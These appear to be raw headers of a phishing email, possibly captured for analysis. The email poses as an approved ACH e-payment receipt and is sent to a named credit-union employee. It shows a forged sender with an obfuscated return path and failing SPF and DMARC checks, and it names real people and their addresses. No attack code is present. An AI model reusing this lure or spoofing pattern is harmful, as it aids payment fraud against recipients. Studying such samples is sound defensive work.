                                                                        Receivedfrom [127.0.0.1] (146.70.247.91) by DS3PEPF000099DB.mail.protection.outlook.com (10.167.17.197) with Microsoft SMTP Server (version=TLS1_3, cipher=TLS_AES_256_GCM_SHA384) id 15.20.8534.20 via Frontend Transport; Wed, 19 Mar 2025 20:04:19 +0000
                                                                        Authentication-Resultsspf=pass (sender IP is 2a01:111:f403:240a::724) smtp.mailfrom=vacationplanners.com; dkim=none (message not signed) header.d=none;dmarc=pass action=none header.from=vacationplanners.com;
                                                                        Received-SpfFail (protection.outlook.com: domain of vacationplanners.com does not designate 146.70.247.91 as permitted sender) receiver=protection.outlook.com; client-ip=146.70.247.91; helo=[127.0.0.1];
                                                                        X-Ms-Exchange-Authentication-Resultsspf=fail (sender IP is 146.70.247.91) smtp.mailfrom=vacationplanners.com; dkim=none (message not signed) header.d=none;dmarc=fail action=none header.from=vacationplanners.com;
                                                                        Content-Typemultipart/mixed; boundary="----sinikael-?=_1-17424153445420.3362181023124944"
                                                                        Content-Transfer-Encoding7bit
                                                                        Content-Dispositionattachment
                                                                        From"Ashleigh Adams <Ashleigh_Adams97@emmerichandsons.com>" <"30320104182931044334fadceb388a85af9bdfS06d7/1625a670VTBi6CQyXeyDy1wryFIMr3RzkndQNcHCwzONIhSLem ail.email.pandadoc.net/c/eJxMj8Fu2zwQhJ9GvMmguBRFHXSI80NMDkyLUVNSS04NZUAAAGVw6CR29v/pvc1904L93trBtOEtASP_BLDVCUpdT7gGMZDh16GQXhTGSDbK6XDg/rr4UBwmx.01-jenn"@vacationplanners.com>
                                                                        ToAlison Bagnulo <Alison.Bagnulo@firstontario.com>
                                                                        SubjectApproved ACH / ePayments reciept for Firstontario epayment powered by Fastpay Ref_4104ee99b1c6f51c657203ba9a2ba2a3f702cb6e.
                                                                        Message-Id<070ca546-3d8b-7110-9538-922642438253@vacationplanners.com>
                                                                        DateWed, 19 Mar 2025 20:04:17 +0000
                                                                        MIME-Version1.0
                                                                        Return-Path "30320104182931044334fadceb388a85af9bdfS06d7/1625a670VTBi6CQyXeyDy1wryFIMr3RzkndQNcHCwzONIhSLem ail.email.pandadoc.net/c/eJxMj8Fu2zwQhJ9GvMmguBRFHXSI80NMDkyLUVNSS04NZUAAAGVw6CR29v/pvc1904L93trBtOEtASP_BLDVCUpdT7gGMZDh16GQXhTGSDbK6XDg/rr4UBwmx.01-jenn"@vacationplanners.com
                                                                        X-Eopattributedmessage1
                                                                        X-Ms-Traffictypediagnostic DS3PEPF000099DB:EE_|MW5PR13MB5632:EE_|QB1PEPF00004E0C:EE_|YT3PR01MB6297:EE_
                                                                        X-Ms-Office365-Filtering-Correlation-Id af71b689-5bf4-404c-7295-08dd67213f48
                                                                        X-Ms-Exchange-Senderadcheck1
                                                                        X-Ms-Exchange-Antispam-Relay0
                                                                        X-Microsoft-Antispam-Untrusted BCL:0;ARA:13230040|38142699006|37132699006|2093699003|3143699003|3123699003|376014|82310400026|9613299012|61400799027|34020700016|36860700013|9015299003|10002299003|4053099003|1513699012|2613699012|3613699012|95630200002;
                                                                        X-Microsoft-Antispam-Message-Info-Original dzpW8tGAI2neRSItMxXh2DjUXJTSQlpD4T8LtbvD2ZUVDTJpFdWyYWyjK4oAmcqRbTGmm7JD6+y9IPkDgIWqVPxfii+N/3yZYnV53NDXhWHn//G2Lhv3y28iuXnxbI6CUfqdXoy1xWehAYodwynyO40eWneus/bEqnXLMk3Ao7mLfVP24ZxyM9nl3Q1rxZQlW4g+wQywAzozz8MfIBhDzmt+Qtzyhtd1JUM9OVF/ty9e0SpM8y0vcwTwjBYr/V2xFOaBpSrv0llZEHxlIAa06BM4cc/KBZE8r7zsFqidAZmWzSSdBDAXOu6kqYuAiDzmXS7ZlAGpdg48J28R0/GMprIIVz1R4Tf8Loc4xwIyiN4Z56h4Uzoifuietg4y6oD+N6FKhRxFBlmj6Zf4eI15NP40DNkG3MAcCWcvRiLBEqt9cVPYU5TzrjQ5TV2njwCGUaY8DkEjX323vUM+5y8t/bCowDjGYVwlR+kRZ5ZNIWKmN1PakyqzVXNdRaQP0Cjmu7v0QW6lKUIqT+5LnRyNx60g/0eJK2Ey1WcldA/Vi6RwEM1jzjFV0C8WCN2pntckd6N9LemNsVs2m+uCp752n1DfVmLNP+oS2V4clycw6A7h9eTo65YLO4TwBzHYrJ5PkAn/XZV3zxccqWrCANscymQ3CH0Qu8SXtMo4s8SibwRpmDNJ7HcC49zDfFlfGUQLmiRK0QRNnZ5ZeEL1ehV6Z7RSCmOUCjM42znPjTA5QypmvAaZhIZVvGjjGYwtLYK0/rtbKPQw3W+OiwE/OoOZLUwlEvEoaIKenjimMjO74hAFs9GKFESK23hWQrGO8tcfVE51vhgSHGnpJTi/r08mKwiezKlRmhCrZlLsHcximjnXUrK9qUIBHL55g+ItWIZw60Bwn9HAQY6rQreCQB3gDO3QkgSs7TQTzThxO7R1MxVkdiSIgM+oDhOe5MOYjUe+u6wxEBuML5NjE8uoSY/hIpfZPI8i5BKLCV7VoUflLjRzcVfWbW3NvJ+fFLsigNFHdXb0W+EIvIiVYMPE/NndZoyNAOowYt7+Gn8+wbGHfGGSi6f5xrcRMr2zlYjqwhhzN8w10I22exESpw4c8KRqISMSoTGvyazuDzA/QMcq9m/MNxhN9yGNdk5m3/dYQYqNQb4djW/pKGJDk1dSiovJjnJj2lJsFEh5Y1FoGWpXQSPfIGx0fME+lEG7IITwt/J/5RWZxYCG8iDz7GM5t/S1gwHV5vVaHIvO1GhIXsKjnCNZlOZLLlgrJgDXC4cJzHsuziSmHqgiiCq7oU1Sng1CzgHtQmhr/ys2r6KC/zBRMM7e/H6c8wqrNfj7KyWjrQL9kO+ctPnqDOWCgz1wjstZ1V0Tl8jdSHj+IEHdgac4ZIXmUy/YWg1Itc2XqkdqXWVbLcMc2uCiD9HT8/dOjQcsxu7k0KkKjLmhmQyRqDwb86OQfqcQIyyfrhUZ4zhmPK07mSt73wlpjv/dKoW9yL6AfZHfpdrsUQobF7ORj2NE0zk=
                                                                        X-Forefront-Antispam-Report-Untrusted CIP:146.70.247.91;CTRY:AE;LANG:en;SCL:1;SRV:;IPV:NLI;SFV:NSPM;H:[127.0.0.1];PTR:InfoDomainNonexistent;CAT:NONE;SFS:(13230040)(38142699006)(37132699006)(2093699003)(3143699003)(3123699003)(376014)(82310400026)(9613299012)(61400799027)(34020700016)(36860700013)(9015299003)(10002299003)(4053099003)(1513699012)(2613699012)(3613699012)(95630200002);DIR:OUT;SFP:1102;
                                                                        X-Ms-Exchange-Transport-CrosstenantheadersstampedMW5PR13MB5632
                                                                        X-Ms-Exchange-Organization-Expirationstarttime19 Mar 2025 20:04:24.9772 (UTC)
                                                                        X-Ms-Exchange-Organization-ExpirationstarttimereasonOriginalSubmit
                                                                        X-Ms-Exchange-Organization-Expirationinterval1:00:00:00.0000000
                                                                        X-Ms-Exchange-Organization-ExpirationintervalreasonOriginalSubmit
                                                                        X-Ms-Exchange-Organization-Network-Message-Id af71b689-5bf4-404c-7295-08dd67213f48
                                                                        X-Eoptenantattributedmessage704f30be-15a6-482a-b249-cfe161841910:0
                                                                        X-Ms-Exchange-Organization-MessagedirectionalityIncoming
                                                                        X-Ms-Exchange-Transport-Crosstenantheadersstripped QB1PEPF00004E0C.CANPRD01.PROD.OUTLOOK.COM
                                                                        X-Ms-Exchange-Transport-Crosstenantheaderspromoted QB1PEPF00004E0C.CANPRD01.PROD.OUTLOOK.COM
                                                                        X-Ms-PublictraffictypeEmail
                                                                        X-Ms-Exchange-Organization-Authsource QB1PEPF00004E0C.CANPRD01.PROD.OUTLOOK.COM
                                                                        X-Ms-Exchange-Organization-AuthasAnonymous
                                                                        X-Ms-Office365-Filtering-Correlation-Id-Prvs a46a3366-2453-47a4-29d2-08dd67213c41
                                                                        X-Ms-Exchange-AtpmessagepropertiesSA|SL

                                                                        Icon Hash:46070c0a8e0c67d6